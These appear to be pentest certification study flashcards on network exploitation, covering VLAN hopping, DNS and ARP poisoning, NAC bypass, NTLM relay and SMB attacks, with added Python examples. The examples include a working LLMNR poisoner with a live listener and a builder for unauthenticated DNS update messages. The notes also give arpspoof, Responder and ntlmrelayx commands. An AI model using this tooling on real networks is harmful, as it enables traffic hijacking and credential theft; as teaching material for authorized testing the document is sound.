Chapter 07: Exploiting Network Vulnerabilities Flashcards
Packet Storm
Includes news as well as exploit information and code
DION NOTES
* Contains news articles, advisories, whitepapers, tools, and exploits that can be reviewed and used in pentests
VLAN Hopping
VLAN Hopping is when you access a VLAN other than the one you’re currently on
Double Tagging
* Used on 802.1Q trunked interfaces
* Insert the native VLAN’s tag as the first tag, and the target VLAN’s tag as the second tag
* The first switch treats the frame as native VLAN traffic and sends it out the trunk untagged, which strips the outer tag; the next switch on the path reads the second (inner) tag and delivers the frame into the target VLAN
* Only works when the attacker's access port is in the trunk's native VLAN and the native VLAN is carried untagged; many orgs mitigate this by moving the native VLAN to an unused VLAN ID, tagging the native VLAN (vlan dot1q tag native), and keeping user ports out of it
Switch Spoofing
* Makes the attacking host act like a trunking switch
* Because the host appears to be a switch that allows trunks, it receives (and can view) traffic sent on other VLANs
* Requires that local network devices be configured to allow the attacking host to negotiate trunks, with an interface set to dynamic desirable, dynamic auto, or trunk mode
* If you get control of network devices or discover a misconfigured or poorly maintained and managed network, switch spoofing can provide additional visibility into VLANs that might otherwise be hidden
DION NOTES
If you gain access to a workstation located in one VLAN, you're going to have to break out of that VLAN to gain access to other sensitive areas of the network
* VLAN Hopping is a technique exploiting a misconfiguration to direct traffic to a different VLAN without proper authorization
Double Tagging
* Attacker tries to reach a different VLAN by abusing how the trunk port handles its native VLAN
* Inner tag contains the true destination VLAN chosen by the attacker
* Outer tag contains the native VLAN, which is the one VLAN that travels across the trunk port without a tag
* When the first switch receives the frame, it removes the outer (native) tag as the frame leaves the trunk, and the next switch forwards the frame into the VLAN of the second, inner tag
* The destination is not going to double tag the data that gets sent back, so it's a one-way trip
* EX: You can send an exploit into the target VLAN with double tagging that establishes a beacon calling out to a C2 server; once the beacon connects outbound, you have two-way comms from outside the LAN
* EX: When you don't need a response back, such as a DoS or stress test
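The double-tag mechanics described in both sets of notes above, as an added example (it is not code from the study guide or the Dion notes): it builds a real 802.1Q double-tagged Ethernet frame with struct, then models the two switches in the path. The first switch strips the outer tag only when it matches the trunk's native VLAN; the second switch trusts whatever tag is now first. The MAC addresses and payload are constructed lab values, and the switch behaviour is a simplified model of the native-VLAN handling the notes describe.

```python
import struct

ETH_P_8021Q = 0x8100   # TPID that marks an 802.1Q tag
ETH_P_IP = 0x0800

# Constructed lab MACs for the example (assumptions, not from the notes)
ATTACKER_MAC = bytes.fromhex("020000000001")
VICTIM_MAC = bytes.fromhex("020000000002")


def vlan_tag(vid: int, pcp: int = 0) -> bytes:
    """4-byte 802.1Q tag: TPID 0x8100 then TCI (3-bit PCP, 1-bit DEI, 12-bit VID)."""
    tci = ((pcp & 0x7) << 13) | (vid & 0x0FFF)
    return struct.pack("!HH", ETH_P_8021Q, tci)


def double_tagged_frame(dst: bytes, src: bytes, native_vid: int, target_vid: int, payload: bytes) -> bytes:
    """Attacker's frame: outer tag = the trunk's native VLAN, inner tag = the VLAN to reach."""
    return dst + src + vlan_tag(native_vid) + vlan_tag(target_vid) + struct.pack("!H", ETH_P_IP) + payload


def parse_frame(frame: bytes):
    """Return (dst, src, [VIDs in order], ethertype, payload), walking any stacked tags."""
    dst, src = frame[:6], frame[6:12]
    off, vids = 12, []
    while off + 4 <= len(frame) and struct.unpack("!H", frame[off:off + 2])[0] == ETH_P_8021Q:
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    return dst, src, vids, ethertype, frame[off + 2:]


def first_switch_to_trunk(frame: bytes, trunk_native_vid: int):
    """Model of the first switch: traffic belonging to the trunk's native VLAN egresses the
    trunk untagged, so the outer tag is removed. If the outer tag is not the native VLAN the
    frame keeps it and stays in the attacker's own VLAN; we return None to signal 'no hop'."""
    _, _, vids, _, _ = parse_frame(frame)
    if not vids or vids[0] != trunk_native_vid:
        return None
    return frame[:12] + frame[16:]   # keep the 12 address bytes, drop the 4-byte outer tag


def second_switch_delivery_vlan(frame: bytes):
    """Model of the next switch: it trusts the first tag it sees and forwards into that VLAN."""
    _, _, vids, _, _ = parse_frame(frame)
    return vids[0] if vids else None


def hop(native_vid_on_trunk: int, attacker_access_vid: int, target_vid: int):
    """End to end: the attacker (in attacker_access_vid) uses its own VLAN as the outer tag and
    the target VLAN as the inner tag. Returns the VLAN the far switch delivers into, or None."""
    frame = double_tagged_frame(VICTIM_MAC, ATTACKER_MAC, attacker_access_vid, target_vid, b"constructed payload")
    on_trunk = first_switch_to_trunk(frame, native_vid_on_trunk)
    return None if on_trunk is None else second_switch_delivery_vlan(on_trunk)


if __name__ == "__main__":
    print("native VLAN 1, attacker in VLAN 1, target 20 ->", hop(1, 1, 20))     # 20: hop succeeds
    print("native VLAN moved to 999, attacker in VLAN 1 ->", hop(999, 1, 20))  # None: mitigated
```

The second call is the mitigation from the notes: once the trunk's native VLAN is an unused ID the attacker cannot sit in, the outer tag is never stripped and the frame never reaches the inner VLAN.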
Switch Spoofing
* Attacker conducts a Dynamic Trunking Protocol (DTP) negotiation so the switch port it sits on becomes a trunk and starts delivering tagged traffic for every allowed VLAN; hard-setting user ports to access mode and disabling DTP (switchport nonegotiate) prevents this
CAM Overload
* Overloaded CAM tables result in switches failing open and acting like a hub, which repeats every frame it receives on every port in that VLAN
* Pentesters can flood the CAM table with bogus source MAC addresses (e.g. with macof) until it fills and fails open
* Then you can sniff traffic on a port you have set up a listener on and read traffic destined for other hosts on the same VLAN (flooding stays within the VLAN, so this does not cross VLAN boundaries on its own)
DNS Spoofing / DNS Cache Poisoning
A poisoned DNS entry will point traffic to the wrong IP address and allow attackers to redirect traffic to a system of their choice
Most DNS poisoning relies on vulnerabilities in DNS software, but improperly configured or secured DNS servers can allow attackers to present DNS information without proper validation
Pentesters can modify the local hosts file on compromised systems to resolve hostnames to specified IP addresses
Can also modify the actual DNS server for a network
DION NOTES
DNS Cache Poisoning
* Attacker attempts to change the IP of a domain name that’s stored in the DNS cache of a given DNS server
* If they can do this, any client who requests the site in the future is going to be redirected to a website controlled by the attacker, which allows further exploitation
* There are multiple places DNS caches exist though, including on the client itself, default gateway or router, local DNS server, ISP DNS server, and all upstream DNS servers to the root DNS nameserver
To Conduct DNS Cache Poisoning
* First, check whether the target server answers recursive queries with nmap (a server that will not recurse for you has no cache you can fill on its behalf)
* nmap -sU -p 53 --script=dns-recursion [IP]
* Separately, check whether the server accepts unauthenticated dynamic DNS updates (RFC 2136) with nmap; this is a different misconfiguration from open recursion, and either one is worth checking regardless of the other
* nmap -sU -p 53 --script=dns-update --script-args=dns-update.hostname=[hostname],dns-update.ip=[IP] [target]
* This command attempts an unauthenticated dynamic update that binds the hostname to the new IP address you want it to resolve to
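The two nmap checks above, as an added example that is not code from the notes or from nmap's NSE scripts: it builds the DNS messages on the wire with struct, so you can see exactly what dns-recursion inspects (the RA bit in the response header) and what dns-update sends (an opcode 5 UPDATE message with no TSIG). The sample response bytes are constructed to look like an open resolver's answer for example.com; the zone and hostnames in the update are assumptions.

```python
import struct


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(qname: str, qtype: int = 1, txid: int = 0x1234, rd: bool = True) -> bytes:
    """Standard query; RD=1 asks the server to recurse on our behalf."""
    flags = 0x0100 if rd else 0x0000
    return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_header(msg: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),        # 1 = response
        "opcode": (flags >> 11) & 0xF,      # 0 = QUERY, 5 = UPDATE
        "ra": bool(flags & 0x0080),         # Recursion Available: the bit dns-recursion looks at
        "rcode": flags & 0x000F,
        "counts": (qd, an, ns, ar),
    }


def recursion_available(response: bytes) -> bool:
    """True when the server says it will recurse for us: an open resolver whose cache is a target."""
    h = parse_header(response)
    return h["qr"] and h["ra"] and h["rcode"] == 0


def build_update(zone: str, hostname: str, ip: str, ttl: int = 300, txid: int = 0x4242) -> bytes:
    """RFC 2136 dynamic UPDATE adding an A record with no TSIG, i.e. the unauthenticated update
    that dns-update attempts. The section counts mean something different from a query:
    ZOCOUNT=1 (zone in the question slot), PRCOUNT=0, UPCOUNT=1 (the new RR), ADCOUNT=0."""
    header = struct.pack("!HHHHHH", txid, 5 << 11, 1, 0, 1, 0)
    zone_section = encode_name(zone) + struct.pack("!HH", 6, 1)                         # type SOA, class IN
    rdata = bytes(int(o) for o in ip.split("."))
    update_rr = encode_name(hostname) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata     # A, IN, TTL, RDLENGTH
    return header + zone_section + update_rr


# Constructed response, as an open resolver would return it for build_query("example.com"):
# flags 0x8180 = QR | RD | RA, one answer, A record 198.51.100.10 (documentation range)
SAMPLE_OPEN_RESOLVER_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    + encode_name("example.com") + struct.pack("!HH", 1, 1)
    + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes([198, 51, 100, 10])
)
# The same answer from a server that refuses recursion: RA bit clear (0x8100)
SAMPLE_NO_RECURSION_RESPONSE = SAMPLE_OPEN_RESOLVER_RESPONSE[:2] + b"\x81\x00" + SAMPLE_OPEN_RESOLVER_RESPONSE[4:]


def send_and_check(server_ip: str, qname: str = "example.com", timeout: float = 2.0) -> bool:
    """Live version of the recursion check for a lab; the samples above run offline."""
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_query(qname), (server_ip, 53))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return recursion_available(data)


if __name__ == "__main__":
    print("open resolver?", recursion_available(SAMPLE_OPEN_RESOLVER_RESPONSE))      # True
    print("recursion refused?", recursion_available(SAMPLE_NO_RECURSION_RESPONSE))   # False
    upd = build_update("target.example", "www.target.example", "203.0.113.7")
    print("UPDATE opcode:", parse_header(upd)["opcode"], "bytes:", len(upd))
```

A server that accepts the UPDATE answers with RCODE 0 (NOERROR); REFUSED (RCODE 5) is the expected answer from a correctly configured zone.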
Many Ways to Conduct DNS Poisoning
* Poisoning workstation’s or server’s DNS cache
* Hijacking local DNS server
* Performing an unauthorized zone transfer from a misconfigured DNS server to enumerate its records, then going after the A record of a given web server; note that a zone transfer itself is read-only, so actually changing the record takes an unauthenticated dynamic update or control of the server
DNSSEC
DNS Security Extensions
* Uses digital signatures based on public-key cryptography to ensure DNS data is digitally signed by the owner
* It lets validating resolvers detect spoofed or altered records, which makes cache poisoning far harder; it protects the authenticity and integrity of DNS data, not its confidentiality
* The zone owner and the resolvers need to configure their DNS servers to support DNSSEC
DNS Zone Transfer
A method of replicating DNS database entries across a set of DNS servers, and it can be used for information gathering and exploitation
Windows Use
* nslookup in interactive mode to attempt a zone transfer
* nslookup
* server [ns.target.com]
* set type=any
* ls -d [domain]
* This says: point at the target's own nameserver, ask for every record type, and list (transfer) all the records for this domain to my system
* If the DNS server is misconfigured to allow transfers from anyone, you get a copy of the entire zone on your local machine
Linux / Mac Use
* dig axfr [domain] @[ns.target.com]
* AXFR = authoritative (full) zone transfer
* Uses the dig tool to request the whole zone for the domain from the target's nameserver; the records are printed to your terminal (dig does not push them to another server)
* Redirect the output to a file, then go through the records and use the information as needed
* Get IPs for servers, subdomains, mail and name servers, etc (aka DNS Harvesting)
nmap use
* nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=[domain] [ns.target.com]
ARP Spoofing
Attacker sends falsified ARP messages on a local network, providing an incorrect MAC address to IP pairing to the deceived system or systems
The information is written to the target machine's ARP cache, and the attacker can then intercept or capture and forward traffic, hijack sessions, or cause additional traffic to hit a target system, potentially causing DoS
DION NOTES
ARP Spoofing
* The sending of falsified ARP messages over a LAN to get the ARP caches to dynamically update with new information
* Remember, ARP creates a binding between IP and MAC inside the LAN using layer 2 OSI / data link
* ARP spoofing is used as a precursor to other attacks, like on-path
ARP Poisoning
* Attack that exploits the IP address to MAC resolution in a network to steal, modify, or redirect frames within the network
* One way to do this is with ARP spoofing
* VLAN segmentation limits the blast radius, and DHCP snooping combined with Dynamic ARP Inspection (DAI) is the switch-side defense against ARP spoofing and poisoning: the switch drops ARP messages whose IP/MAC pairing doesn't match the DHCP snooping binding table, so IPs can't be stolen or taken over by an attacker
To Conduct ARP Poisoning and Redirect Traffic from Victim
1. Identify the MAC address and IP of the victim and the gateway using Wireshark or nmap -PR -sn [target] (conducts an ARP ping and disables the port scan)
2. Use Metasploit (auxiliary/spoof/arp/arp_poisoning) or arpspoof -i [interface] -t [victim IP] [gateway IP] to send the poisoned replies; run it in both directions and enable IP forwarding on your host so the victim's traffic still reaches the gateway through you
MAC Address Spoofing
Can be used to bypass NAC, captive portals, and security filters that rely on a system’s MAC to identify it
Can also be used as MITM and other attacks that rely on systems thinking they’re sending traffic to a legitimate host
MAC addresses can be set manually from the "Advanced" tab of the network adapter's properties on Windows, or with ip link set dev [interface] address [MAC] (or macchanger) on Linux
Replay Attacks
Form of on-path (MITM) attack that focuses on capturing and then resending data
Common uses for replay attacks include masquerading: the attacker presents credentials to a service or system after capturing them during someone else's authentication exchange
One of the most common replay-style attacks used by pentesters is NTLM relay, usually discussed together with pass the hash (pass the hash reuses an NTLM hash you already hold; relay forwards a live authentication to another host)
* Once NTLM authentication can be intercepted, pentesters identify systems that don't require SMB signing (signing is what blocks relay, since the relayed session can't be signed without the key)
* With a list of targets, Responder or other tools intercept authentication attempts
* Then an NTLM relay tool (e.g. impacket's ntlmrelayx) forwards the authentication to a target and can be used to drop Empire or a similar agent onto it
Relay Attacks
The on-path system only relays traffic, unmodified, rather than altering it
These aren't limited to traditional IP-based network traffic; EX: you can query an RFID card or other device required to provide authentication and relay the response to a reader or system the card isn't actually near
NAC Bypass
NAC detection process typically involves one of the following methods:
* A software client that talks to a NAC server when connected
* DHCP proxy that listens for traffic like DHCP requests
* Broadcast listener that looks for broadcast traffic like ARP queries or a more general purpose sniffer that looks at other IP packets
* SNMP-trap-based approach that queries switches to determine when a new MAC address shows up on one of their connected ports
Pentesters need to determine which detection method the NAC is using in order to know how to bypass
EX: Systems that don't require client software and rely on a device's MAC address can sometimes be bypassed by cloning the MAC of an already-admitted device and connecting on the same port it was using
DION NOTES
NAC is used to keep unauthorized users or devices from accessing a private network
* When a device attempts to connect to the network, it's placed in a virtual holding area while it's scanned for AV definitions, security patches, etc
* If it passes, it can enter and access resources
* If it fails, it's placed into digital quarantine until it meets the NAC requirements
Persistent Agents
* A type of software installed on the device requesting access to the network
* Works well in a corporate environment because the org owns all of the devices and controls the software baseline
Non-Persistent Agent
* Requires the users to connect to the network and log in to a web-based captive portal to download an agent that scans their devices for compliance
Agentless NAC / Volatile Agent
* Installs the scanning engine on the domain controller (or another central NAC server) instead of the endpoint device
* Works well with a BYOD policy, or when the org has no access to the endpoint devices to install an agent-based NAC
* Volatile agents run only in RAM and leave nothing installed on the device
How to Bypass
* Exploit an authorized host and use it as a pivot point to send traffic through that device
* Make your device look like something that isn't restricted by NAC, such as a VoIP handset or a printer; most of those are segmented into their own VLAN, though, so you then have to VLAN hop out of it
DoS Attacks and Stress Testing
Most pentests will prohibit intentional DoS attacks in the RoE, particularly against production environments
But some will allow it, or even require it if the client wants to understand their ability to weather them
There are three main types of DoS:
1. Application layer DoS attacks that crash a service or an entire server
2. Protocol-based DoS attacks that take advantage of a flaw in a protocol, like SYN floods
3. Traffic volume-based DoS attacks that overwhelm a target by sending more traffic than it can handle
NOTE: Application layer DoS is likely to happen accidentally during a pentest while exploiting vulnerabilities in services or apps; address unintentional DoS in the RoE and have a clear comms plan for what to do if it happens
If allowed in the scope, pentesters have a number of tools to help:
* Commercial load and stress testing services (stressers)
* Hping
* Metasploit (obviously)
* HTTP Unbearable Load King (HULK)
* Low Orbit Ion Cannon (LOIC)
* High Orbit Ion Cannon (HOIC)
* Slowloris
DION NOTES
Stress testing is a software testing method that evaluates how software performs under extreme load
* Typically, you won’t do this in a pentest unless explicitly asked
* You can stress processor, memory, network, or storage load on a system
Exploit Chaining
Using multiple exploits to achieve your goal
EX: Exploit a vulnerable service --> use a privilege escalation attack from a local service account --> obtain credentials to access other systems for further exploits, etc
DION NOTES
* Chained exploits can be run simultaneously or sequentially
* This is where we combine things to create a holistic attack, and they don’t always have to be technical
NetBIOS
Commonly used for file sharing, but the protocol has many other services that rely on it as well
One of the most commonly targeted services in a Windows network
Port 139 (TCP session service); modern SMB usually runs directly over TCP 445 instead
NetBIOS Name Services and Attacks
When Windows systems need to resolve the IP address for a hostname, they use three lookup methods in the following order:
1. The Local host file found at C:\Windows\System32\drivers\etc\hosts
2. DNS, first via local cache and then via the DNS server
3. Link-local name resolution, first via Link Local Multicast Name Resolution (LLMNR) queries and then via NetBIOS Name Service (NBT-NS) broadcast queries
Most local networks don’t have entries in DNS for local systems, particularly other workstations and network devices
Domain controllers or other important elements of infrastructure may resolve via DNS, but many Windows services will end up falling through to the NetBIOS name service (NBT-NS)
Targeting NetBIOS name service can be surprisingly effective, here’s what it looks like:
* Windows sends LLMNR queries to the link-local multicast group and NBT-NS queries to the subnet's broadcast address --> this provides an opportunity for you to respond with a spoofed answer, redirecting the victim to a host of your choice
As a stand-alone exploit it's not particularly effective, but pairing the spoofed name response with an SMB listener that captures NTLM authentication (Responder, or Metasploit's auxiliary/server/capture/smb) can be powerful, especially on networks that still allow weak methods such as LM or NTLMv1
Once you have the captured responses you can crack them offline or relay the authentication to another host; what you capture is a challenge-response value rather than the NTLM hash itself, so it can't be used directly for pass the hash
* NOTE: This takes more work than reusing a hash because SMB authentication is challenge-response: the client's answer depends on a server-chosen challenge, so a captured answer can't simply be replayed elsewhere
* Metasploit and other SMB capture tools defeat this for LM/NTLMv1 by always sending the fixed challenge 1122334455667788, so precomputed rainbow tables can recover the hash; NTLMv2 responses also mix in a client nonce, so they have to be cracked by dictionary or brute force instead
DION NOTES
Link-Local Multicast Name Resolution (LLMNR)
* Based on the DNS packet format and allows IPv4 and IPv6 hosts on the same local link to resolve each other's names
* Both hosts need to be on same internal network to use the LLMNR
* If no DNS server, Windows can use LLMNR to determine names and IPs of other servers and resources on the network
* Linux does not use LLMNR by default; most distros rely on mDNS (Avahi/ZeroConf) for this, though systemd-resolved can speak LLMNR when it's enabled
NetBIOS Name Service (NBNS or NBT-NS)
* Part of the NetBIOS-over-TCP protocol suite that’s used as a type of name resolution inside the internal network to translate internal names to IPs
* Uses 16-character ASCII name
* Linux can participate too, via Samba's nmbd
* EX: \\fileserver or \\ShareDrive or \\WillsPC (UNC paths that get resolved by short name)
* Windows will defalt to LLMNR, and then fallback to NBNS
To Exploit
Pentesters can use Responder
* CLI tool that poisons NBT-NS, LLMNR, and mDNS name resolution requests, and runs rogue SMB, HTTP and other servers to capture the authentication that follows
* Post-exploitation tool because you have to break into the network first
* Responder will listen for any time a system calls out for a certain machine
* Then, it poisons the name resolution call by sending back incorrect information
* EX: A machine wants to locate the file server, but attacker machine will respond with IP to different server controlled by attacker
* Can perform other attacks and exploits after this; it works best for names no real host answers (typos, stale shortcuts, decommissioned shares), because a legitimate response from the real machine may beat yours
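The LLMNR half of what Responder does, as an added example that is not code from the notes or from Responder: it parses a victim's LLMNR query (same wire format as DNS, UDP 5355, multicast 224.0.0.252), builds a poisoned answer that reuses the victim's transaction ID and points the name at the attacker, and checks that the victim would extract the attacker's IP. The serve() function is the lab listener; the query, name and IPs are constructed values.

```python
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355


def encode_name(name: str) -> bytes:
    """DNS/LLMNR wire-format name: length-prefixed labels ending with a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Read a name at offset (no compression pointers, which LLMNR replies here don't use)."""
    labels = []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode())
        off += n
    return ".".join(labels), off


def llmnr_query(name: str, txid: int) -> bytes:
    """What a Windows host multicasts when DNS fails for a single-label name."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr_query(msg: bytes):
    txid, flags, qd, *_ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or qd != 1:    # ignore responses and malformed queries
        return None
    name, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype}


def poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30):
    """Answer any A query with the attacker's address, echoing the victim's transaction ID
    and question so the victim's resolver accepts it as the reply to its own query."""
    q = parse_llmnr_query(query)
    if q is None or q["qtype"] != 1:
        return None
    header = struct.pack("!HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)   # QR=1, one question, one answer
    question = encode_name(q["name"]) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(q["name"]) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def victim_reads_answer(resp: bytes):
    """What the victim extracts: (transaction ID, IP from the first A answer)."""
    txid, _flags, _qd, _an, *_ = struct.unpack("!HHHHHH", resp[:12])
    _, off = decode_name(resp, 12)
    off += 4                                  # skip QTYPE/QCLASS
    _, off = decode_name(resp, off)
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    off += 10
    return txid, ".".join(str(b) for b in resp[off:off + rdlen])


def serve(attacker_ip: str, interface_ip: str = "0.0.0.0"):
    """Lab listener: join the LLMNR group and answer every A query with attacker_ip.
    Not run by the offline demo; the attacker must share the link with the victim."""
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(interface_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, (src_ip, src_port) = sock.recvfrom(2048)
        reply = poisoned_response(data, attacker_ip)
        if reply:
            sock.sendto(reply, (src_ip, src_port))   # LLMNR answers are unicast back to the querier


if __name__ == "__main__":
    q = llmnr_query("fileserver", 0x2A2A)                   # constructed victim query
    r = poisoned_response(q, "10.0.0.99")                    # constructed attacker IP
    print("victim resolves fileserver to", victim_reads_answer(r))   # (0x2a2a, '10.0.0.99')
```

Because LLMNR is only consulted after DNS fails, the poisoner never needs to beat a real DNS answer; it only needs to be the first (or only) host on the link that claims the name.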
Pages 257-261 of the study guide have in-depth diagrams
NetBIOS Ports
- 135, TCP: MS-RPC endpoint mapper (epmap)
- 137, UDP: NetBIOS name service
- 138, UDP: NetBIOS datagram service
- 139, TCP: NetBIOS session service
- 445, TCP: SMB
Using Responder with NetBIOS
When exploiting NetBIOS and LLMNR responses, Responder is powerful
It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, LLMNR, and multicast DNS queries pretending to be the system that the query is intended for
Once Responder sees an authentication attempt, it will capture the hash automatically, allowing Responder to continue running in the background as you attempt other exploits or conduct further pentest work
Once you have intercepted an authentication, you can use Responder's MultiRelay (or impacket's ntlmrelayx) to relay the NTLM authentication to a target that doesn't require SMB signing; if the relay succeeds you can execute code there
Windows net Commands
Exploring Windows domains is easier with net commands:
* net view /domain: Lists the domains visible from this host; net view /domain:[domain name] lists the hosts in that domain (use it for the current domain or any other one the system can reach)
* net user /domain: Lists the users in the domain
* net accounts /domain: Shows the domain password policy
* net group /domain: Lists groups on the domain
* net group “Domain Admins” /domain: Adding a group name like “Domain Admins” to the net group command lists users in the group
* net share: Show current SMB shares
* net session: Lists the SMB sessions open against this host; piping into find can filter for a particular user or client
* net share [name of share]=c:\directory\of\your\choice /GRANT:Everyone,FULL: Shares a folder on the system with full rights for any user; easy to tighten by naming specific users or permission levels
SMB Exploits
Server Message Block
The SMB implementation in Windows is another popular target for pentesters
Its vulnerabilities mean that unpatched systems can be exploited with relative ease; these include the critical RCE vulnerabilities in the Windows SMBv1 server patched in 2017 (MS17-010, exploited by EternalBlue)